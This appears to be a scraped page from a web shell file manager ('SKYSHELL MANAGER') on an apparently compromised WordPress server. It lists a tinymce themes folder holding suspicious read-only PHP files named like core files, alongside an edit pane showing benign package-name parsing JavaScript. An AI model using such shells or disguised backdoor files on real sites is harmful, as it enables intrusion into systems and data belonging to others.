📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.js
var scopePattern = /^(?:(@[^/]+)[/]+)([^/]+)[/]?/ var basePattern = /^([^/]+)[/]?/ module.exports = extract.bind(null, false) module.exports.base = extract.bind(null, true) function extract(isBase, str) { if (/^@/.test(str)) { var match = scopePattern.exec(str) if (!match || !match[1] || !match[2]) return null if (isBase) return match[2] || null return [ match[1], match[2] ].join('/') } else { var match = basePattern.exec(str) if (!match) return null return match[1] || null } }
Save